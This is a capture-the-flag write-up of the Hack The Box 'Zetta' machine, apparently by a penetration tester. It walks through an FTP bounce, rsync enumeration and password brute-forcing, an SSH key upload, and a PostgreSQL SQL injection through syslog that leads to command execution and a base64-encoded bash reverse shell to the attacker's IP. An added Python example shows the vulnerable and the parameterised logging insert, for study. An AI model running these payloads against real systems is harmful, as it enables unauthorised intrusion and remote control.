[HTB] Zetta — Write-up

Recon

Nmap

### Initial Nmap
nmap -Pn --open -sC -sV -p- -T4 10.10.10.156

Web Server (HTTP — 80/TCP)

Initial Foothold

FTP Login

FXP — FTP Bounce Attack

### Nmap FTP Bounce Attack
nmap -Pn -p- -T5 --open -v -b AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@10.10.10.156 127.0.0.1

RFC2428 — FTP Extensions for IPv6 and NATs

### EPRT Command
quote EPRT |1|10.10.10.156|2222|
quote EPRT |2|dead:beef:2::102e|2222| # My Kali IPv6 Address
quote LIST
### Tcpdump
tcpdump -i tun0 -vvv ip6
FTP Service
Tcpdump

Nmap 2

### Nmap IPv6
nmap -Pn --open -p- -sC -sV -6 dead:beef::250:56ff:feb9:495f

Rsync

### Rsync List Module
nmap -Pn --open -p 8730 -6 --script=rsync-list-modules -sC -sV dead:beef::250:56ff:feb9:495f
### Rsync Module Access
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:495f]:8730/bin
### Rsync Module Access
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:495f]:8730/etc
### Rsync Module Copy
rsync -av rsync://[dead:beef::250:56ff:feb9:495f]:8730/etc /root/Documents/htb/box/zetta/rsync/etc
### /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
roy:x:1000:1000:roy,,,:/home/roy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/sbin/nologin
postgres:x:106:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
### Rsync "home_roy" Module Access
rsync -av rsync://roy@[dead:beef::250:56ff:feb9:495f]:8730/home_roy

Rsync — Password Brute-force

### Rsync Password Brute-force
cat rockyou.txt | while read i; do export RSYNC_PASSWORD=$i;
rsync -q rsync://roy@[dead:beef::250:56ff:feb9:495f]:8730/home_roy 2>/dev/null;
if [[ $? -eq 0 ]];
then echo "[+] Pass: $i" && break;
fi;
done

User Shell #1 (Roy)

Rsync — SSH Key Upload

rsync -aR .ssh/ rsync://roy@[dead:beef::250:56ff:feb9:495f]:8730/home_roy/

User Shell #2 (Postgres)

roy@zetta:~$ id
uid=1000(roy) gid=1000(roy) groups=1000(roy),4(adm),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Roy’s Home Dir

.tudu.xml — rsync

.tudu.xml — PostgreSQL

### Fetching Git Log
git log -p

PostgreSQL SQL Injection Attack

SQLi Vulnerability Check

### Monitoring PostgreSQL Log
roy@zetta:/var/log/postgresql$ tail -f postgresql-11-main.log
### Logger Query
logger -p local7.info "bigb0ss" # No error - Without single-quotes
logger -p local7.info "bigb0ss'" # Yes error - With single-quotes
No SQL Error
Yes SQL Error

SQLi Attack to RCE

### SQLi Attempt #1
logger -p local7.info "bigb0ss',null);
DROP TABLE IF EXISTS test;
CREATE TABLE test(cmd_output text);
COPY test FROM PROGRAM 'ping -c 1 10.10.14.48';
SELECT * FROM test;
DROP TABLE IF EXISTS test;-- -"
### SQLi Attempt #2
logger -p local7.info "bigb0ss',null);
DROP TABLE IF EXISTS test;
CREATE TABLE test(cmd_output text);
COPY test FROM PROGRAM \$$ ping -c 1 10.10.14.48 \$$;
SELECT * FROM test;
DROP TABLE IF EXISTS test;-- -"
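An added example, not code from the write-up or the box, showing the bug class behind the quote check above and the stacked-query payloads: a log-ingest function that concatenates the syslog message into its INSERT, beside a parameterised version. sqlite3 stands in for PostgreSQL so it runs offline, and the table, column and function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the syslog -> database ingest path. The probe and
# the payload shape are the write-up's; the stacked statement is reduced to a
# CREATE TABLE because SQLite has no COPY ... FROM PROGRAM.
PROBE = "bigb0ss'"
PAYLOAD = "bigb0ss',null); CREATE TABLE test(cmd_output text);-- -"


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE syslog_lines (message TEXT, priority TEXT)")
    return db


def log_vulnerable(db, message, priority="local7.info"):
    """Builds the INSERT by string formatting. executescript mirrors a backend
    that runs stacked statements (PostgreSQL's simple-query protocol does),
    which is what turns a quote error into arbitrary SQL."""
    sql = "INSERT INTO syslog_lines VALUES ('%s', '%s');" % (message, priority)
    db.executescript(sql)


def log_safe(db, message, priority="local7.info"):
    """Parameterised INSERT: the message is bound as data, never parsed as SQL."""
    db.execute("INSERT INTO syslog_lines VALUES (?, ?)", (message, priority))
    db.commit()


def run(logger):
    """Feed the probe and the payload through one logger and report whether the
    probe raised a SQL error, which tables exist afterwards, and what was stored."""
    db = fresh_db()
    probe_errored = False
    try:
        logger(db, PROBE)
    except sqlite3.Error:  # the "Yes SQL Error" signal in the PostgreSQL log
        probe_errored = True
    logger(db, PAYLOAD)
    tables = sorted(r[0] for r in db.execute(
        "SELECT name FROM sqlite_master WHERE type='table'"))
    messages = [r[0] for r in db.execute("SELECT message FROM syslog_lines")]
    return probe_errored, tables, messages


if __name__ == "__main__":
    print("vulnerable:", run(log_vulnerable))  # probe errors, extra table appears
    print("safe:      ", run(log_safe))        # no error, both lines stored verbatim
```

Detection-wise, the same syntax error the write-up watches for in postgresql-11-main.log is the signal a defender should alert on: a logging pipeline should never produce SQL syntax errors from user-supplied message text.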

SQLi Attack to Reverse Shell

### Reverse Shell
bash -i >& /dev/tcp/10.10.14.48/443 0>&1
### Base64 Encode (Avoid potential syntax error on the payload)
echo -n "bash -i >& /dev/tcp/10.10.14.48/443 0>&1" | base64
### SQLi Attack
logger -p local7.info "bigb0ss',null); DROP TABLE IF EXISTS test; CREATE TABLE test(cmd_output text); COPY test FROM PROGRAM \$$ echo \"echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OC80NDMgMD4mMQ== | base64 -d | bash\" | bash \$$;-- -"

SSH — Postgres

Root Shell

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
